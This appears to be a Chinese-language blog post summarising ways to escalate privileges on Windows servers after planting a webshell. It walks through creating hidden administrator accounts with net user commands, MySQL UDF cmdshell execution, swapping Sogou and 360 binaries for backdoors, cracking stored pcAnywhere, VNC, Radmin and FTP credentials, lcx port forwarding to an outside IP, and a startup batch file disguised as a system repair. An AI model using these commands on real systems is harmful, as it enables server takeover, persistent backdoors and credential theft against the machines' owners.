常用webshell提权方法总结
pcAnywhere提权:
1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power
users用户的目录权限,只剩下administer和system用户目录权限,则无法提权;
2.在webshll的大马中查找到pcanywhere目录里的host目录,里面的cif文件保存了连接pcanywhere的账户和密码,然后下载下来,通过PcAnywhere密码破解工具进行破解密码,然后再自己的电脑上安装pcanywhere,然后通过连接到另一台电脑进行远程桌面连接;
——————————–
利用HASH破解提权:
1.工具:ophcrack-win32-installer-3.3.0(hash破解软件)
,Pwdump7(查看hash的软件),彩虹表(密码字典)
2.思路:渗透,管理员可能几台服务器都实用同个密码,我们获取其他一个以后可以尝试登陆
其他服务器
3.例如添加一个用户并将该用户添加到管理员组:net
user backlion 123456 /add
net localgroup administrators backlion
/add
4.在dos下用pwdump7运行查看该用户的hash值:backlion:1003:2FB6717FC6897581AAD3B435B51404EE:DA0492D72F8D04983188CCD4CA257E44:::
5.然后通过ophcrack和彩虹表进行破解该用户
6.防范:密码超过14位就不能破解,建议密码设置15位,越复杂越好
————————————————
MYSQL提权(udf.dll):
1.用的文件有su.php木马,Linx
Mysql
BackDoor.php木马
1.udf.dll的默认路径:C:\Winnt\udf.dll(win2000系统),C:\Windows\udf.dll
(win2003系统)
2.找到网站目录mysql配置文件,常用的有:config.php,web.php,webconfig.php
配置文件如下:
$dbhost
= ‘localhost’; // 数据库服务器 就是127.0.0.1
$dbuser = ‘root’; //
数据库用户名
$dbpw = ‘a’; // 数据库密码
$dbname = ‘dz’; //
数据库名
3.在su.php中,填入host:127.0.0.1 user:root passwor:a
db:mysql,然后输入sql命令进行添加用户:select state(“net user backlion 123 /add
& net localgroup administrators backlion /add”)
然后通过net
user查看是否添加成功
4.在udf.ph 中host:127.0.0.1 user:root passwor:a
db:mysql,然后填入DLL导出路径:C:\Windows\udf.dll ,在sql命令中输入一下命令:
create
function cmdshell returns string soname
‘udf.dll’//添加一个udf.dll组件函数
select cmdshell(‘net user backlion$
123456 /add’); //添加一个用户
select cmdshell(‘net localgroup
administrators backlion$ /add’); //将用户添加到管理员组
select
cmdshell(‘c:\3389.exe’); //这个是把开3389的文件放到C盘,然后运行
drop function
cmdshell; //删除函数
select cmdshell(‘netstat -an’);
//这是查看端口查开放情况
———————————————————————-
Churrasco提权:
1.用到的工具有:win2003
0day漏洞工具03.exe和cmd.exe;
2.然后在webshell中上传我们的03.exe和cmd.exe到可以读写的目录中,然后切换到可读写的目录中:然后在webshll路径中填入我们的cmd.exe路径如;c
:/recyle/cmd.exe 下面填入:c :/recyle/03.exe “net user backlion 123 /add
& net localgroup adminstrators backlion
/add”
————————————————————————————–
利用sogou输入法(6.0)提权:
1.sogou输入法是6.0版本,然后我们通过webshll木马管理,查找到sogou安装的路径,然后通过上传
ImeUtil.exe
替换原来的ImeUtil.exe文件,只要一加载这个程序就会在系统中自动添加管理员
用户名:sunwear
密码:sunwear
————————————————————
lcx内网端口转化,解决在内网不能远程桌面登录:
1.webshll目标站点的wscript组件开启,并且有一个可读写的目录,一般上传到c:/recyle目录下
2.上传我们的cmd.exe和lcx.exe上去
3.然后在shll路径中填入:c:/recyle/cmd.exe
下面就输入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1
3389
4.在本地DOS下输入: d:/lcx.exe listen 51 3333
监听51并转发到3333端口
4.在本地远程桌面里面输入:127.0.0.1:3333
———————————————
6Gftp提权:
1.默认安装目录C:\Program
Files\Gene6 FTP Server
2.密码保存文件的路径是在C:\Program Files\Gene6 FTP
Server\RemoteAdmin\Remote.ini
其配置文件如下:
[Server]
IP=127.0.0.1,8021\r\n
//使用的端口号
GrantAllAccessToLocalHost=0
[Acct=Administrator]
//用户名
Enabled=1
Rights=0
Password=21232F297A57A5A743894A0E4A801FC3
//md5密码
3.在webshll中发现了有安装g6ftp软件,默认安装路径
4.在shll中输入:C:\recycler\lcx.exe
-tran 8022 127.0.0.1
8021
6.在本地安装6gftp软件,IP地址输入:目标站点IP地址。端口号为8022,用户名为administrator,密码为破解出来的md5值;
——————————————–
Serv-U6.4提权:
1.serv-u的密钥:9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2.在serv-u中下面的命令中输入:cmd
/c net user backlion$ 123 /add & net localgroup administrators
backlion$
/add
3.然后就添加了一个用户名
4.就可以用这个账号远程桌面登录了;
—————————————————-
VNC密码的破解和提权:
1在webshll中读取vnc注册表键值:RealVNC的注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password
UltraVNC的注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password
读取的是十进制数,需要转换成十六进制如下:
十六进制:D7
51 CC 73 31 24 7A 93
十进制: 12 7C EF FA 6E 0B 7A
D9
3.破解vnc密码:vncpwdump.exe
D751CC7331247A93
4.然后在本地安装一个VNC客户端,进行远程连接
—————————————————————-
Radmin提权:
1.在webshll中检查出有安装Radmin程序;
2.在读取Radmin注册表键值,然后把读取的十进制转换成16进制;
3.直接用radmi-hash工具连接,把读取的十六进制填入进去;
4.最后可以用radmin客户端连接就行了;
————————————————–
360安全卫士提权:
1.上传我们的cmd.exe和360.exe到可读写的目录下如:c:/recyle
2.在shell中输入:c:/recyle/cmd.exe
然后在下面输入:c:/recyle/360.exe
sethc
3.然后远程桌面登录输入目标IP地址,过一会就弹出了一个DOS窗口,然后就可以添加用户名和密码
———————————————————————————
启动项提取:
1.在webshll中上传一个添加用户的批处理文件如:net
user backlion$ 123456 /add & net localgroup adminsitrators
backlion$ /add
爆出为系统修复.bat;
2.然后在wegshll中输入启动选的路径:C:\Documents
and Settings\Administrator\「开始」菜单\程序\启动
上传我们的批处理文件;
3.只要管理员下次重新启动机子,就能自动添加我们的账号;
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。